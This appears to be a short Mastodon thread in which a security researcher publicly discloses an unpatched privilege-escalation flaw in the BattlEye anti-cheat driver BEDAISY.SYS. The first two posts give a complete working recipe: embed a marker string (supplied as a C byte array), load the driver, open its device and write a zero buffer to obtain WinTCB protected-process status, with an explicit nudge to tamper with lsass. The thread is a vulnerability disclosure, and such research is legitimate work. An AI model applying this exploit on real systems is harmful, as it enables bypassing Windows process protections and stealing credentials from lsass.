Post APPGuMsI29YLmZu5c8 by Rairii@infosec.exchange
 (DIR) More posts by Rairii@infosec.exchange
 (DIR) Post #APPGuLPtSFFDGDbtiK by Rairii@infosec.exchange
       2022-11-08T21:21:35Z
       
       3 likes, 2 repeats
       
       OK, so I'm going to drop a nice #ZeroDay here. At least I think it's 0day, but for bring your own vulnerable driver purposes it's still not blocklisted (despite reporting it months ago, maybe MS only adds drivers that are actively exploited):BattlEye Anti-Cheat BEDAISY.SYS PPL privesc:Have the string "top BEService&pi" somewhere in your executable PE image. You can just write it to .data if you want.Load bedaisy.Open its \\?\GLOBALROOT\Device\BattlEye device.Write a 9-byte zerofilled buffer to it.Congratulations, you just got WinTCB PPL, go tamper with lsass or whatever.#AntiCheat #PrivEsc
       
 (DIR) Post #APPGuMsI29YLmZu5c8 by Rairii@infosec.exchange
       2022-11-08T21:22:32Z
       
       0 likes, 0 repeats
       
       For my PoC purposes I just did this for step 1 by the way:BYTE MagicMarker[] = {    't', 'o', 'p', ' ',    'B', 'E', 'S', 'e',    'r', 'v', 'i', 'c',    'e', '&', 'p', 'i'};
       
 (DIR) Post #APPGuPn5ByAcpIUTPk by Rairii@infosec.exchange
       2022-11-08T21:29:39Z
       
       0 likes, 0 repeats
       
       This is the problem with privileged obfuscated code, greets to the people on unknowncheats who publicised a slightly glitchy devirtualised bedaisy.sys, I found the issue in not long at all thanks to that.Also, the driver does set PPL by using hardcoded EPROCESS offsets (chosen by windows version, I guess different driver versions support different windows versions but for the ones I know about winblue up to 1904x are supported), so YMMV.